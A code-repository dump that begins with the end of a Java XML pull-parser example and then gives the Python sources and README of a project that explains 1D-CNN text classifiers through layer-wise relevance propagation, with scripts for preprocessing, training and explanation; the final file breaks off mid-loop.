}else if (pullParser.getName().equals("id")){
eventType = pullParser.next();
book.setId(Integer.parseInt(pullParser.getText()));
}else if (pullParser.getName().equals("name")){
eventType = pullParser.next();
book.setName(pullParser.getText());
}else if (pullParser.getName().equals("price")){
eventType = pullParser.next();
book.setPrice(Float.parseFloat(pullParser.getText()));
}
break;
case XmlPullParser.END_TAG:
if (pullParser.getName().equals("book")){
books.add(book);
book = null;
}
break;
}
eventType = pullParser.next();
}
return books;
}
@Override
public String serialize(List<Book> books) throws Exception {
return null;
}
}
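The event loop in `Pull_BookParser` is the classic pull-parsing pattern: advance through events, branch on tag names, collect objects. Outside Android, the same loop can be sketched with the JDK's built-in StAX API; this is a hedged analogue using `javax.xml.stream`, not the Android `XmlPullParser` itself, and the class name is made up for the example.

```java
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamReader;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;

// Plain-JDK sketch of the same START_ELEMENT event loop,
// collecting the text of every <name> element.
public class StaxBookDemo {
    public static List<String> parseNames(String xml) {
        List<String> names = new ArrayList<>();
        try {
            XMLStreamReader reader = XMLInputFactory.newInstance().createXMLStreamReader(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)), "UTF-8");
            while (reader.hasNext()) {
                int event = reader.next();
                if (event == XMLStreamConstants.START_ELEMENT
                        && reader.getLocalName().equals("name")) {
                    // getElementText() consumes the text up to the matching end tag
                    names.add(reader.getElementText());
                }
            }
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
        return names;
    }

    public static void main(String[] args) {
        String xml = "<books><book><id>1</id><name>First</name></book>"
                + "<book><id>2</id><name>Second</name></book></books>";
        System.out.println(parseNames(xml)); // prints [First, Second]
    }
}
```

The structure maps one-to-one onto the Android version: `XMLStreamConstants.START_ELEMENT` plays the role of `XmlPullParser.START_TAG`, and `hasNext()`/`next()` replace the `END_DOCUMENT` sentinel.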
|
a5923cbdf5e465ac78b5d0202b2e5e23908cda1d
|
[
"Java"
] | 2 |
Java
|
noodlespub/XML_Parse
|
9edeb0dced3e88f0d11425005056dce34651f9c1
|
bb0609829eeeae4127e30a0ce2cad3a3ac8b89dd
|
refs/heads/main
|
<repo_name>Wednesque/xai-cnn-lrp<file_sep>/preprocessor.py
import numpy as np
from sklearn.model_selection import train_test_split
import pandas as pd
import json
import os
import csv
from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing.text import Tokenizer
from keras_preprocessing.text import tokenizer_from_json
filepath_dict = {'yelp': 'data/sentiment_analysis/yelp_labelled.txt',
'amazon': 'data/sentiment_analysis/amazon_cells_labelled.txt',
'imdb': 'data/sentiment_analysis/imdb_labelled.txt',
'merged' : 'data/sentiment_analysis/merged_sent.txt',
'qa_1000': 'data/sentiment_analysis/qa_1000.txt',
'TREC_10': 'data/sentiment_analysis/TREC_10.txt',
'qa_5500': 'data/sentiment_analysis/qa_5500.txt',
}
# This class transforms sentences into embedding matrices for text classification
# Each input file consists of a list of sentences, each followed by its class label.
# Set gen to True to force the regeneration of the embedding model.
tokenizer_path = "./tokenizers/"
class Preprocessor :
def __init__(self,source='yelp', embedding_dim=50, max_words = 100, gen = True, n_classes=2, embedding_dir = 'data/glove_word_embeddings', tokenizer_file=None) :
print("Initializing the preprocessor....")
self.embedding_dim = embedding_dim # number of column of the embedding matrix
self.max_words = max_words # number of lines of the embedding matrix
self.embedding_model_file = embedding_dir+'/glove.6B.'+str(self.embedding_dim)+'d.txt'
self.n_classes = n_classes
self.gen = gen
self.source = source
self.df = self.load_data_sources(source)
#self.load_models()
self.tokenizer = self.load_tokenizer(tokenizer_file)
self.datasets_path = './datasets/'+self.source
print("Preprocessor initialized")
def load_tokenizer(self, file_name = None):
if file_name is None :
file_name = tokenizer_path + "/" + self.source + '_tokenizer.json'
if os.path.isfile(file_name) :
with open(file_name) as f:
data = json.load(f)
tokenizer = tokenizer_from_json(data)
return tokenizer
else :
return Tokenizer(num_words=10000)
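`load_tokenizer` above restores a saved tokenizer from JSON if the file exists, otherwise it starts fresh. The persistence idea can be sketched without Keras: serialize a word-to-index mapping to JSON and restore it on the next run. This is a toy stand-in with made-up names, not the Keras `tokenizer_from_json` format.

```python
import json
import os
import tempfile

# Toy stand-in for the tokenizer round-trip above: persist a word->index
# mapping as JSON, and fall back to an empty vocabulary when no file exists.
def save_vocab(vocab, path):
    with open(path, 'w', encoding='utf-8') as f:
        f.write(json.dumps(vocab, ensure_ascii=False))

def load_vocab(path):
    if os.path.isfile(path):
        with open(path, encoding='utf-8') as f:
            return json.load(f)
    return {}  # same spirit as returning a fresh Tokenizer

path = os.path.join(tempfile.gettempdir(), 'toy_vocab.json')
save_vocab({"good": 1, "food": 2}, path)
print(load_vocab(path))  # → {'good': 1, 'food': 2}
```

As in the class above, writing with `ensure_ascii=False` keeps non-ASCII tokens readable in the saved file.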
def save_tokenizer(self,file_name=''):
tokenizer_json = self.tokenizer.to_json()
with open(tokenizer_path + "/" + self.source + '_tokenizer.json', 'w', encoding='utf-8') as f:
f.write(json.dumps(tokenizer_json, ensure_ascii=False))
# This method loads the basic utility models from files if they exist; otherwise they are generated.
# Set the property gen to True to force the regeneration of those models.
def load_models(self,source = None):
if self.gen or not os.path.isfile('./embedding_dic.json'):
# update the embedding dic
self.embedding_dic = self.create_filtered_embedding_dic()
else :
self.embedding_dic = self.loadDicModel('./embedding_dic.json')
def load_all_data_sources(self):
df_list = []
for source, filepath in filepath_dict.items():
df = pd.read_csv(filepath, names=['sentence', 'label'], sep='\t', encoding="utf8")
df['source'] = source # Add another column filled with the source name
df_list.append(df)
self.df = pd.concat(df_list)
return self.df
def load_data_sources(self,source) :
self.df = self.load_all_data_sources()
self.df = self.df[self.df['source'] == source]
return self.df
def loadDicModel(self, file):
with open(file) as json_file:
return json.load(json_file)
def sentence_to_matrix(self, sentence):
embedding_matrix = np.zeros((self.max_words,self.embedding_dim))
i = 0
for word in sentence :
if word in self.embedding_dic :
embedding_matrix[i] = np.array(self.embedding_dic[word])
i+=1
if i == self.max_words :
break
return embedding_matrix
def generate_embedding_dataset(self):
print("Start dataset generation...")
sentences = self.df['sentence'].values
y = self.df['label'].values
sentences_train, sentences_test, y_train, y_test = train_test_split(sentences, y, test_size=0.25,
random_state=1000)
# generate the embedding dataset for train sentences
print("Generating train set...")
self.generate_dataset_matrix(sentences_train,y_train,self.datasets_path+"/train.csv",self.datasets_path+"/train_sents_ref.json")
#generate embedding dataset for test sentences
print("Generating test set...")
self.generate_dataset_matrix(sentences_test, y_test ,self.datasets_path+"/test.csv",self.datasets_path+"/test_sents_ref.json", test=True)
print("Datasets generated")
print("Train set : "+self.datasets_path+"/train.csv")
print("Test set : "+self.datasets_path+"/test.csv")
def generate_dataset_matrix(self, sentences, y_vect, output_file, sent_ref_file, test=False):
writer = csv.writer(open(output_file, 'w', newline=''), delimiter=',')
matrix = np.empty((0, self.embedding_dim * self.max_words + self.n_classes + 1), dtype=np.float16)
i = 0 # index of the sentence.
sentences_ref = dict()
hope = max(1, len(sentences) // 100)  # progress step: 1% of the data
for sent,y in zip(sentences,y_vect) :
matrix = self.sentence_to_matrix(sent)
out = [0]*self.n_classes
#print(y, sent)
out[y] = 1
sentences_ref.update({i:{'sentence':sent,'class':int(y)}})
matrix = np.insert(np.append(matrix.reshape((1, self.embedding_dim * self.max_words)), out), 0, i)
matrix = matrix.reshape(1, 1 + self.n_classes + self.embedding_dim * self.max_words)
writer.writerow(['{:.3f}'.format(x) for x in matrix.flatten()])
#compute the progession
i+=1
percentage = i/hope
if i%hope == 0 :
print(i,out,sent)
print(str(percentage)+"% completed")
if (not test and i==200000) or (test and i==50000) :
break
refs = json.dumps(sentences_ref, indent=4)
f = open(sent_ref_file, "w")
f.write(refs)
f.close()
def create_embedding_dic(self):
embed_dic = dict()
with open(self.embedding_model_file, encoding="utf8") as f:
for line in f :
word, *vector = line.split()
wv = np.array(vector, dtype=np.float16)[:self.embedding_dim]
embed_dic.update({word: wv.tolist()})
refs = json.dumps(embed_dic, indent=4)
f = open("embedding_dic.json", "w")
f.write(refs)
f.close()
def get_sequences(self, create_tokenizer=False) :
sentences = self.df.sentence.astype(str).values
y = self.df['label'].values
out = np.zeros((len(y), self.n_classes))
for i in range(len(y)) :
out[i,y[i]] = 1
sentences_train, sentences_test, y_train, y_test = train_test_split(sentences, out, test_size=0.25,random_state=1000)
if create_tokenizer :
self.tokenizer = Tokenizer()
self.tokenizer.fit_on_texts(sentences)
self.save_tokenizer()
X_train = self.tokenizer.texts_to_sequences(sentences_train)
X_test = self.tokenizer.texts_to_sequences(sentences_test)
self.vocab_size = len( self.tokenizer.word_index) + 1 # Adding 1 because of reserved 0 index
maxlen = self.max_words
X_train = pad_sequences(X_train, padding='post', maxlen=maxlen)
X_test = pad_sequences(X_test, padding='post', maxlen=maxlen)
return(X_train, y_train, X_test, y_test)
def texts_to_sequences(self,file_path) :
df = pd.read_csv(file_path, names=['sentence', 'label'], sep='\t', encoding="utf8")
sentences = df.sentence.astype(str).values
y = df['label'].values
out = np.zeros((len(y), self.n_classes))
for i in range(len(y)) :
out[i,y[i]] = 1
X_test = self.tokenizer.texts_to_sequences(sentences)
X_test = pad_sequences(X_test, padding='post', maxlen=self.max_words)
return(X_test, out)
def get_pad_sequence(self,text):
seq = self.tokenizer.texts_to_sequences(text)
pad_seq = pad_sequences(seq, padding='post', maxlen=self.max_words)
return pad_seq
def get_sentences(self, create_tokenizer=False) :
sentences = self.df.sentence.astype(str).values
y = self.df['label'].values
out = np.zeros((len(y), self.n_classes))
for i in range(len(y)) :
out[i,y[i]] = 1
sentences_train, sentences_test, y_train, y_test = train_test_split(sentences, out, test_size=0.25,random_state=1000)
return(sentences_train, y_train, sentences_test, y_test)
def create_filtered_embedding_dic(self):
embed_dic = dict()
vocab = self.vocabulary()
with open(self.embedding_model_file, encoding="utf8") as f:
for line in f :
word, *vector = line.split()
if word in vocab :
wv = np.array(vector, dtype=np.float16)[:self.embedding_dim]
embed_dic.update({word:wv.tolist()})
refs = json.dumps(embed_dic, indent=4)
f = open("embedding_dic.json", "w")
f.write(refs)
f.close()
return embed_dic
def create_embedding_matrix(self):
vocab_size = len(self.tokenizer.word_index) + 1 # Adding again 1 because of reserved 0 index
embedding_matrix = np.zeros((vocab_size, self.embedding_dim))
with open(self.embedding_model_file, encoding="utf8") as f:
for line in f:
word, *vector = line.split()
if word in self.tokenizer.word_index:
idx = self.tokenizer.word_index[word]
embedding_matrix[idx] = np.array(
vector, dtype=np.float32)[:self.embedding_dim]
return embedding_matrix
def vocabulary(self):
tokenizer = Tokenizer()
sentences = self.df['sentence'].values
tokenizer.fit_on_texts(sentences)
return tokenizer.word_index
def filter_embedding_dic(self) :
pass
<file_sep>/README.md
# xai-cnn-lrp
This repository contains code to explain one-dimensional convolutional neural networks (1D-CNNs) using Layer-wise Relevance Propagation. The explanation technique computes the relevance of the various n-gram features and determines sufficient and necessary n-grams. The code was developed for experimental purposes and cannot handle every type of 1D-CNN architecture without adaptation. The project comes with a multi-channel 1D-CNN model generator which can be used to generate testing models.
# Dependencies :
- python 3.6+
- keras (tested on 2.2+)
- numpy (1.16+)
- pandas (0.24+)
The project contains 4 main directories :
- data/sentiment_analysis :
This directory contains training and test data used to build 1D-CNN models and to test the explanation method.
- models :
This directory contains pretrained 1D-CNN models for sentiment analysis and question answering tasks.
- tokenizers :
This directory contains saved Keras tokenizers for the various datasets. A tokenizer contains the vocabulary that was used
to build the pretrained model.
- explanations :
This directory contains the results of explanations produced when executing the file explain_cnn.py. Each explanation is a json
file whose name is derived from the name of the explained model.
# Explaining a model
## Quick start :
The file explain_cnn.py already has default values. To execute the explainer with the default configuration, simply run the following command :
python explain_cnn.py
By default, this command will compute the explanation of the first 10 sentences of the "merged" dataset (yelp+amazon+imdb). The result will be in the file
./explanations/merged_all_feature_ngrams.json
## Custom configurations :
For custom configurations, execute the following actions :
1. Open the file explain_cnn.py and edit the model parameters :
- Set the variable model_name to the model you want to explain. Pretrained model names are : merged (sentiment analysis), qa_1000 and qa_5500 (question answering).
- Set the variable n_classes to the number of classes.
- Set the embedding dimension (embedding_dim) and the maximum number of words per sentence (max_words).
By default, the pretrained models were built with a word embedding dimension of 50 and a maximum of 50 words per sentence.
- Set the variable class_names to the names of the classes :
class_names = ['NEGATIVE','POSITIVE'] for sentiment analysis
or class_names = ['DESC','ENTY','ABBR','HUM','NUM','LOC'] for question answering
- The variable kernel_sizes is a list of integers giving the kernel size per channel. Example : kernel_sizes = [1,2,3]
N.B : If you are not sure which parameters to use for a particular model, consider building a new model with your
own parameters (see the section : Training a 1D-CNN model below)
2. run the command python explain_cnn.py
3. The result of the explanation is contained in the directory explanations under the name : <model_name>_all_feature_ngrams.json
## To explain the model on a single sentence :
Edit the file explain_sentence.py and set the appropriate parameters, or leave the default ones. Set the variable sent to the sentence to explain.
Then run the command :
python explain_sentence.py
N.B : - The code implemented to explain a 1D-CNN assumes that the CNN architecture taken as input has exactly 2 dense layers,
a variable number of channels (from 1 to n), a single global max-pooling layer, one convolution layer per channel,
and a variable number of filters and kernel sizes per channel.
- Future versions will take into account models with a variable number of dense layers.
# Model explanation results
The complete json file representing the explanation for a set of predictions is structured as follows :
[
{
"sentence": [
"it was either too cold not enough flavor or just bad"
],
"target_class": "NEGATIVE",
"predicted_class": "NEGATIVE",
"features": {
"all": {
"1-ngrams": [
{
"was": {
"NEGATIVE": 0.07160788029432297,
"POSITIVE": -0.06556335836648941,
"Overall": 0.13717123866081238
}
},
{
"not": {
"NEGATIVE": 0.1827062964439392,
"POSITIVE": -0.19882133603096008,
"Overall": 0.38679349422454834
}
},
...
],
"0-ngrams": [
{
"": {
"NEGATIVE": 0.1498018503189087,
"POSITIVE": -0.11607369035482407,
"Overall": 0.26587554812431335
}
}
]
},
"sufficient": {
"1-ngrams": [
{
"not": 0.38679349422454834
}
]
},
"necessary": {}
}
},
...
]
The json file is a list of elements, each representing the explanation for a particular input sentence,
and is designed to be self-explanatory. Contributions are in the form
- ngram_feature :
- CLASS_NAME : value
- The value of the key "Overall" is the relevance of the feature to the predicted class, computed as the difference between its contribution
to that class and the mean of its contributions to the other classes.
"0-ngrams" represents n-gram features which are not in the vocabulary, or the translation of 0-padding sequences.
# Training a 1D-CNN model
The project comes with code to train your own 1D-CNN.
To build your own CNN model for text classification, do the following :
1. Define the model parameters.
- model_name : model names are defined in the dictionary filepath_dict in the file preprocessor.py. If you want to build a model from your
own dataset, make sure the data file is saved inside the directory data/sentiment_analysis and that its format is as described in data/readme.txt.
Also make sure to add an entry corresponding to the data file to the dictionary filepath_dict.
- embedding_dim : the dimension of the word embeddings
- n_classes : the number of classes in the dataset
- max_words : the maximum number of words per sentence. Shorter sentences will be padded and longer sentences will be
truncated to max_words.
- kernel_sizes : a list of integers giving the kernel size per channel. Example : kernel_sizes = [1,2,3] means that there are 3 channels;
the first channel has filters of kernel size 1, the second channel has filters of kernel size 2 and the third channel has filters of kernel size 3.
- n_filters : a list giving the number of filters per channel. Example : n_filters = [40,40,40] means that every channel has 40 filters,
which makes a total of 120 filters.
NB : len(kernel_sizes) == len(n_filters)
2. Then execute the command :
python train_1d_cnn.py
The model will be saved in the directory models under a name derived from the value of the variable model_name.
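As a sketch, a parameter block consistent with the constraints above might look like this (the values are illustrative, not the pretrained settings; the variable names mirror train_1d_cnn.py):

```python
model_name = 'merged'     # key into filepath_dict in preprocessor.py
embedding_dim = 50        # dimension of the word embeddings
n_classes = 2             # 2 for sentiment analysis, 6 for question answering
max_words = 50            # sentences are padded/truncated to this length
kernel_sizes = [1, 2, 3]  # one kernel size per channel -> 3 channels
n_filters = [40, 40, 40]  # 40 filters per channel -> 120 filters in total

# Both lists must describe the same channels:
assert len(kernel_sizes) == len(n_filters)
print(sum(n_filters))  # 120
```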
<file_sep>/process_imdb.py
import numpy as np
from keras.preprocessing.text import Tokenizer
from sklearn.model_selection import train_test_split
import pandas as pd
import json
import os
import csv
filepath = 'data/sentiment_analysis/IMDB_Dataset.csv'
df = pd.read_csv(filepath, names=['sentence', 'label'], sep=',', encoding="utf8")
sentences = df['sentence'].values
labels = df['label'].values
writer = csv.writer(open("imdb_labelled_50000.csv", 'w', newline='',encoding="utf8"), delimiter='\t')
for sent,y in zip(sentences,labels) :
label = 0
sent = sent.replace('"',"")
sent = sent.replace("\t"," ")
sent = sent.replace("<br />"," ")
if y == "positive" :
label = 1
writer.writerow([sent,label])
<file_sep>/explain_sentence.py
from preprocessor import Preprocessor, filepath_dict
from keras.preprocessing.sequence import pad_sequences
from keras.models import model_from_json
from explainer import TextCNNExplainer
def load_model(file_name) :
json_file = open(file_name, 'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
return model
models_dir = './models/'
embedding_dim = 50
n_classes=6
max_words = 50
kernel_sizes=[1]
model_name = 'qa_5500'
#test_file_path = filepath_dict['qa_5500']
class_names = ['DESC','ENTY','ABBR','HUM','NUM','LOC']
#class_names = ['NEGATIVE','POSITIVE']
file_name = model_name+'_d'+str(embedding_dim)+'_l'+str(max_words)
model = load_model(models_dir+file_name+".json")
#sgd = optimizers.SGD(lr=0.01, decay=1e-6, momentum=0.1, nesterov=True)
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
# load weights into new model
model_file_path = models_dir+file_name
model.load_weights(models_dir+file_name+'.h5')
print("Loaded model from disk")
model.summary()
pre = Preprocessor(source=model_name, max_words = max_words, embedding_dim=embedding_dim, n_classes=n_classes)
#sentence to explain
sent = "what is your name ?"
seq = pre.tokenizer.texts_to_sequences([sent])
seq = pad_sequences(seq, padding='post', maxlen=max_words)
explainer = TextCNNExplainer(pre.tokenizer, model_file_path, class_names, kernel_sizes=kernel_sizes)
#explanations = explainer.compute_ngrams_contributions(model, X_test[0:10,:], y_test[0:10,:])
explanations = explainer.compute_ngrams_contributions(model, seq)
print(explanations)<file_sep>/sequential_cnn.py
from keras.models import Sequential
from keras import layers
from sklearn.model_selection import train_test_split
from keras import optimizers
from sklearn.metrics import confusion_matrix
from sklearn.linear_model import LogisticRegression
from keras.layers.merge import concatenate
import numpy
from keras.models import Model
import tensorflow as tf
from keras.layers import Input
numpy.set_printoptions(precision=2)
import pandas as pd
from numpy.linalg import norm
model_name='yelp'
model_dir='models'
train_dataset = 'datasets/'+model_name+'/train.csv'
test_dataset = 'datasets/'+model_name+'/test.csv'
embedding_dim = 50
text_length = 50
n_class = 2
train_data = pd.read_csv(train_dataset, delimiter=",").values
test_data = pd.read_csv(test_dataset, delimiter=",").values
#train_data = numpy.loadtxt(train_dataset, delimiter=",", dtype=numpy.float32)
#test_data = numpy.loadtxt(test_dataset, delimiter=",", dtype=numpy.float32)
numpy.random.shuffle(train_data)
numpy.random.shuffle(test_data)
X_train = train_data[:,1:-n_class]
y_train = train_data[:,-n_class]
X_test = test_data[:,1:-n_class]
y_test = test_data[:,-n_class]
train_norms = norm(X_train, axis=1, ord=2)
test_norms = norm(X_test, axis=1, ord=2)
train_norms[train_norms == 0] = 1
test_norms[test_norms == 0] = 1
print(train_norms)
X_train = X_train / train_norms.reshape(X_train.shape[0],1)
X_test = X_test / test_norms.reshape(X_test.shape[0],1)
print(train_data[0,0],train_data[0,-2],train_data[0,-1])
print(train_data[10,0],train_data[10,-2],train_data[10,-1])
print(train_data[50,0],train_data[50,-2],train_data[50,-1])
print(train_data[80,0],train_data[80,-2],train_data[80,-1])
X_train = X_train.reshape((X_train.shape[0], text_length, embedding_dim))
X_test = X_test.reshape((X_test.shape[0], text_length, embedding_dim))
model = Sequential()
model.add(layers.Conv1D(100, 3, activation='relu'))
model.add(layers.GlobalMaxPool1D())
model.add(layers.Dense(10, activation='relu'))
model.add(layers.Dense(3, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
history = model.fit(X_train, y_train, epochs=200, verbose=True,
validation_data=(X_test, y_test), batch_size=32)
model.summary()
loss, accuracy = model.evaluate(X_train, y_train, verbose=False)
print("Training Accuracy: {:.4f}".format(accuracy))
loss, accuracy = model.evaluate(X_test, y_test, verbose=False)
print("Testing Accuracy: {:.4f}".format(accuracy))
<file_sep>/process_sent140.py
import numpy as np
from keras.preprocessing.text import Tokenizer
from sklearn.model_selection import train_test_split
import pandas as pd
import json
import os
import csv
import re
filepath = 'data/sentiment_analysis/training.1600000.processed.noemoticon.csv'
df = pd.read_csv(filepath, names=['label', 'id', 'date', 'flag','user','sentence'], sep=',', encoding="utf8")
sentences = df['sentence'].values
labels = df['label'].values
writer = csv.writer(open("sent140.txt", 'w', newline='',encoding="utf8"), delimiter='\t')
max = 0
for sent,y in zip(sentences,labels) :
label = 0
sent = sent.replace('"',"")
sent = sent.replace("\t"," ")
sent = sent.replace("<br />"," ")
sent = re.sub("^@\w+",'',sent).strip()
if (len(sent)>max) :
max = len(sent)
#print (sent,y)
if y == 4 :
print("hit")
label = 1
elif y == 2 :
label = 2
if len(sent) < 50 :
writer.writerow([sent,label])
print(max)<file_sep>/lime.py
from lime.lime.lime_text import LimeTextExplainer, TextDomainMapper
import numpy
from keras.models import Model
from keras.models import model_from_json
from preprocessor import Preprocessor
def load_model(file_name) :
json_file = open(file_name, 'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
return model
embedding_dim = 50
n_classes=6
max_words = 50
models_dir = './models/'
model_name = 'qa_5500'
class_names = ['DESC','ENTY','ABBR','HUM','NUM','LOC']
#class_names = ['NEGATIVE','POSITIVE']
file_name = model_name+'_d'+str(embedding_dim)+'_l'+str(max_words)
model = load_model(models_dir+file_name+".json")
#sgd = optimizers.SGD(lr=0.01, decay=1e-6, momentum=0.1, nesterov=True)
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
# load weights into new model
model_file_path = models_dir+file_name
model.load_weights(models_dir+file_name+'.h5')
print("Loaded model from disk")
model.summary()
pre = Preprocessor(source=model_name, max_words = max_words, embedding_dim=embedding_dim, n_classes=n_classes)
#X_train, y_train, X_test, y_test = pre.get_sequences()
X_train, y_train, X_test, y_test = pre.get_sentences()
def new_predict(sample):
print(sample)
seq = pre.get_pad_sequence(sample)
print(seq)
#sample = seq.reshape(1, len(sample))
return model.predict(seq)
id=3
explainer = LimeTextExplainer(class_names=class_names)
exp = explainer.explain_instance(text_instance=X_test[id],labels=[0,1,2,3,4,5],classifier_fn=new_predict, num_samples=10000)
seq = pre.get_pad_sequence(X_test[id])
print(seq)
sent = pre.tokenizer.sequences_to_texts(seq)
print(sent)
out = new_predict([X_test[id]])
print(out)
y = numpy.argmax(out)
for i in range(6) :
print(class_names[i])
print(exp.as_list(i))
<file_sep>/train_1d_cnn.py
from preprocessor import Preprocessor
from text_cnn import TextCNN
#Define parameters :
model_name = 'merged' # other sentiment analysis predefined names include : imdb, yelp, amazon; QA models include : qa_1000 and qa_5500
embedding_dim = 50
n_classes=2 #change to 6 for question answering task
max_words = 50
kernel_sizes = [1]
n_filters = [40]
pre = Preprocessor(source=model_name,max_words = max_words,embedding_dim=embedding_dim, n_classes=n_classes)
X_train, y_train, X_test, y_test = pre.get_sequences(create_tokenizer=True)
#embedding_matrix = pre.create_embedding_matrix()
text_cnn = TextCNN(embedding_dim=embedding_dim,text_length=max_words, n_class=n_classes,kernel_sizes = kernel_sizes, n_filters = n_filters, batch_size=32,epochs=15 )
model = text_cnn.train(X_train, y_train, X_test, y_test, None, len(pre.tokenizer.word_index) + 1)
text_cnn.evaluate(X_train, y_train, X_test, y_test)
text_cnn.save_model(model_name)<file_sep>/text_cnn_old.py
from keras.models import Sequential
from keras import layers
from sklearn.model_selection import train_test_split
from keras import optimizers
from sklearn.metrics import confusion_matrix
from sklearn.linear_model import LogisticRegression
from keras.layers.merge import concatenate
import numpy
from keras.models import Model
import tensorflow as tf
from keras.layers import Input
import pandas as pd
numpy.set_printoptions(precision=2)
from numpy.linalg import norm
class TextCNN :
def __init__(self, batch_size=32, text_length=50, embedding_dim=50, kernel_sizes = [1,2,3], n_filters = [100,100,100], n_class = 3):
self.kernel_sizes = kernel_sizes
self.n_filters = n_filters
self.embedding_dim = embedding_dim
self.batch_size = batch_size
self.text_length = text_length
self.n_class = n_class
self.model = None
def train(self, X_train, y_train, X_test, y_test):
pool = []
inputs = []
for kernel_size , n_filters in zip(self.kernel_sizes,self.n_filters) :
input_shape=(self.text_length,self.embedding_dim)
x = Input(shape=input_shape)
C1D = layers.Conv1D(n_filters, kernel_size, activation='relu',input_shape=(self.text_length,self.embedding_dim))(x)
MX1D = layers.GlobalMaxPool1D() (C1D)
pool.append(MX1D)
inputs.append(x)
merged = pool[0]
if len(self.kernel_sizes) > 1 :
merged = concatenate(pool)
dense1 = layers.Dense(10, activation='relu') (merged)
dense2 = layers.Dense(10, activation='relu')(dense1)
outputs = layers.Dense(self.n_class, activation='softmax') (dense2)
self.model = Model(inputs=inputs, outputs=outputs)
sgd = optimizers.SGD(lr=0.01, decay=1e-6, momentum=0.1, nesterov=True)
self.model.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
self.model.summary()
history = self.model.fit([X_train]*len(self.kernel_sizes), y_train, epochs=100, verbose=True, validation_data=([X_test]*len(self.kernel_sizes),y_test), batch_size=self.batch_size)
return self.model
def evaluate(self, X_train, y_train, X_test, y_test):
loss, accuracy = self.model.evaluate([X_train]*len(self.kernel_sizes), y_train, verbose=False)
print("Training Accuracy: {:.4f}".format(accuracy))
loss, accuracy = self.model.evaluate([X_test]*len(self.kernel_sizes), y_test, verbose=False)
print("Testing Accuracy: {:.4f}".format(accuracy))
def save_model(self, model_name, model_dir='./models'):
model_json = self.model.model.to_json()
with open(model_dir+"/"+model_name+".json", "w") as json_file:
json_file.write(model_json)
# serialize weights to HDF5
self.model.save_weights(model_dir+"/"+model_name+".h5")
print("Saved model to disk")
model_name='sent140'
model_dir='models'
train_dataset = 'datasets/'+model_name+'/train.csv'
test_dataset = 'datasets/'+model_name+'/test.csv'
embedding_dim = 50
text_length = 50
n_class = 3
#train_data = numpy.loadtxt(train_dataset, delimiter=",", dtype=numpy.float32)
#test_data = numpy.loadtxt(test_dataset, delimiter=",", dtype=numpy.float32)
train_data = pd.read_csv(train_dataset, delimiter=",").values
test_data = pd.read_csv(test_dataset, delimiter=",").values
numpy.random.shuffle(train_data)
numpy.random.shuffle(test_data)
X_train = train_data[:,1:-n_class]
y_train = train_data[:,-n_class:]
X_test = test_data[:,1:-n_class]
y_test = test_data[:,-n_class:]
# normalize train and test matrices
train_norms = norm(X_train, axis=1, ord=2)
test_norms = norm(X_test, axis=1, ord=2)
train_norms[train_norms == 0] = 1
test_norms[test_norms == 0] = 1
print(train_norms)
X_train = X_train / train_norms.reshape(X_train.shape[0],1)
X_test = X_test / test_norms.reshape(X_test.shape[0],1)
print(X_train[:4,:10])
print(train_data[0,0],train_data[0,-1])
print(train_data[10,0],train_data[10,-2])
print(train_data[50,0],train_data[50,-1])
print(train_data[80,0],train_data[80,-2])
print(X_train.shape)
X_train = X_train.reshape((X_train.shape[0], text_length, embedding_dim))
X_test = X_test.reshape((X_test.shape[0], text_length, embedding_dim))
text_cnn = TextCNN(embedding_dim=embedding_dim,text_length=text_length)
model = text_cnn.train(X_train, y_train, X_test, y_test)
text_cnn.evaluate(X_train, y_train, X_test, y_test)
text_cnn.save_model(model_name)<file_sep>/explain_cnn.py
from explainer import TextCNNExplainer
from keras.models import model_from_json
from preprocessor import Preprocessor, filepath_dict
import json
def load_model(file_name) :
json_file = open(file_name, 'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
return model
models_dir = './models/'
#Define the parameters of the model to explain
embedding_dim = 50
n_classes=2
max_words = 50 # maximum number of word per sentence
kernel_sizes=[1]
model_name = 'merged'
#test_file_path = filepath_dict['qa_5500']
#class_names = ['DESC','ENTY','ABBR','HUM','NUM','LOC']
class_names = ['NEGATIVE','POSITIVE'] # for sentiment analysis
file_name = model_name+'_d'+str(embedding_dim)+'_l'+str(max_words)
model = load_model(models_dir+file_name+".json")
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
# load weights into new model
model_file_path = models_dir+file_name
model.load_weights(models_dir+file_name+'.h5')
print("Model loaded from disk")
model.summary()
pre = Preprocessor(source=model_name, max_words = max_words, embedding_dim=embedding_dim, n_classes=n_classes)
X_train, y_train, X_test, y_test = pre.get_sequences()
#X_test, y_test = pre.texts_to_sequences(test_file_path)
explainer = TextCNNExplainer(pre.tokenizer, model_file_path, class_names, kernel_sizes=kernel_sizes)
#Explain the first 10 instances of the test data.
explanations = explainer.compute_ngrams_contributions(model, X_test[0:10,:], y_test[0:10,:])
refs = json.dumps(explanations, indent=4)
f = open("explanations/"+model_name+"_all_feature_ngrams.json", "w")
f.write(refs)
f.close()
print("Explanations saved in the file : ./explanations/"+model_name+"_all_feature_ngrams.json")
<file_sep>/process_qa.py
import numpy as np
from keras.preprocessing.text import Tokenizer
from sklearn.model_selection import train_test_split
import pandas as pd
import json
import os
import csv
import re
filepath = 'data/sentiment_analysis/QA/TREC_10.label.txt'
labels_ids_path = 'data/sentiment_analysis/QA/qa_label_ids.json'
def load_labels_ids(file_name) :
if os.path.isfile(file_name):
with open(file_name) as f:
return json.load(f)
else:
return dict()
file = open(filepath, 'r', encoding="utf8")
lines = file.readlines()
last_id = 0
id = 0
labels_ids = load_labels_ids(labels_ids_path)
writer = csv.writer(open("data/sentiment_analysis/TREC_10.txt", 'w', newline='\n',encoding="utf8"), delimiter='\t')
for line in lines :
line = line.strip()
fields = line.split(" ")
